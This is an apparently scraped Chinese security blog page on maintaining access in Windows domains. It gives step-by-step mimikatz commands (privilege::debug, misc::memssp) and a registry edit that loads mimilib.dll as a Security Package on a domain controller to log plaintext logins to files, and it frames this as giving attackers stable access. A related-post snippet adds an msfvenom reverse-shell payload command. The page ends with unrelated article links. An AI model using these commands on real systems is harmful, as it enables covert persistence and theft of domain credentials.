内网安全--权限维持
权限维持:为攻击者创造出稳定的输出
域环境的权限维持、单机版的权限维持、web权限维持
#内网域-权限维持-基于验证DLL加载-SSP
启用mimikatz需要用管理员身份
方法一:但如果域控制器,被注入的内存的伪造的ssp将会丢失
privilege::debug
misc::memssp
C:\Windows\System32\mimilsa.log 记录登录的账号密码(前提条件是需要在线切换用户,且服务器不重启)
方法二:使用此方法即使系统重启,也不会影响到持久化的效果
1、mimilib.dll 传到目标域控的c:\windows\system32\目录下
2、修改注册表,重启生效
reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ
c:\windows\system32\kiwissp.log 记录账号密码文件
在实战中一般都是将两种方法同时一起使用
内网安全--权限维持相关推荐
- proxychains代理扫描并获取内网服务器权限
Proxychains Proxychains是为了GNU\Linux操作系统而开发的工具,任何TCP连接都可以通过TOR或者SOCKS4,SOCKS5,HTTP/HTTPS路由到目的地.在这个通道技 ...
- 我是如何通过命令执行到最终获取内网Root权限的
简介 此前我曾发表过一篇ltr101的文章,这是我该系列的第二篇.本文我将为大家展示最近我在赏金计划中,发现的一个非常cool的漏洞.以及我是如何通过一个废弃的Web服务器实现远程执行代码的,并最终成 ...
- 内网渗透-----权限分析及防御
第四章 权限提升分析及防御 生成MSF木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.2 lport=1234 -f exe ...
- 谷歌VirusTotal开源组件曝高危漏洞,可获取内网访问权限
如漏洞遭利用,可导致攻击者不仅访问受谷歌控制的环境,还可以高权限访问50多个内部主机. 安全研究员在 VirusTotal 平台上发现了一个严重漏洞,可被用于实现远程代码执行 (RCE). 该漏洞已修 ...
- [内网渗透]—权限维持
域权限维持 Skeleton Key(万能密码) 原理 当拿到域控权限后,使用mimikatz可以注入Skeleon Key,将 Skeleton Key 注入域控制器的 lsass.exe 进程,这 ...
- 企业安全挑战 内网安全技术十大策略
几乎所有企业对于网络安全的重视程度一下子提高了,纷纷采购防火墙等设备希望堵住来自Internet的不安全因素.然而,Intranet内部的***和***却依然猖狂.事实证明,公司内部的不安全因素远比外 ...
- 工控攻防演示——从外网到内网控制系统设备的入侵
给实验室写的文章,在安全客上发表,在这里再发下 一.概述 实验目的通过工控靶场学习web渗透.内网渗透.工控安全相关知识技能. 靶场信息本实验通过vmware 搭建了靶场的外网和内网环境,在内网环境中 ...
- 利用被入侵的路由器迈入内网——抓包,利用路由器漏洞入侵,进行流量劫持...
from:https://www.anquanke.com/post/id/82638 去年开始利用路由器对目标内网进行渗透的方式方法开始研究,测试了一阵了.看到乌云之前有一篇翻译外国人的文章,讲路由 ...
- 企业内网安全十大防护策略
几乎所有企业对于网络安全的重视程度一下子提高了,纷纷采购防火墙等设备希望堵住来自Internet的不安全因素.然而,Intranet内部的***和***却依然猖狂.事实证明,公司内部的不安全因素远比外 ...
最新文章
- k8s实战之数据卷(volume)
- 分享Silverlight/WPF/Windows Phone一周学习导读(10月16日-10月22日)
- CCNA重点难点:思科交换机生成树配置
- 传统登录实现方式问题思考
- Flask的csrf_token校验
- Cloud一分钟 | 华为云、腾讯云、阿里云中标「央视2018年租赁公有云服务」项目...
- linux环型共享内存,Linux system v 共享内存
- J2ME游戏中的图片处理
- vuedraggable嵌套块拖拽_Vue 基于 vuedraggable 实现选中、拖拽、排序效果
- 论文阅读笔记:《Contextual String Embeddings for Sequence Labeling》
- 【MATLAB】三维曲线(plot3)
- 太原理工大学这两年程序设计等竞赛奖牌统计
- NAT综合实验(华为)
- ORCAD PSPICE 仿真学习
- 说说几种常用的前端缓存
- java强引用不会被回收_强引用(Strong Reference)-不回收
- 【本人秃顶程序员】图解分布式架构的演进过程
- UEditor之图片上传如何和真实项目结合
- 联想a366t 刷android4,联想A366t线刷刷机教程(刷官方rom)
- 5G无线网节能关键技术
热门文章
- 如何使用伦敦金画出支撑阻力线
- pt mysql_pt(Percona Toolkit)工具详解:(二)工具介绍
- PT站点签到脚本,可挂青龙面板自动签到
- 就地初始化与列表初始化
- 【解决报错】java.sql.SQLException: Access denied for user 'root'@'localhost' (using password: YES)
- dxc 3.0 线程的生命周期
- 10.从头开始做服务端
- 数字滤波器的实现——低通滤波器再探究
- “笨办法”学Python3,Zed A. Shaw,习题33
- 高效管理顾客体验,提升顾客转化的王牌选择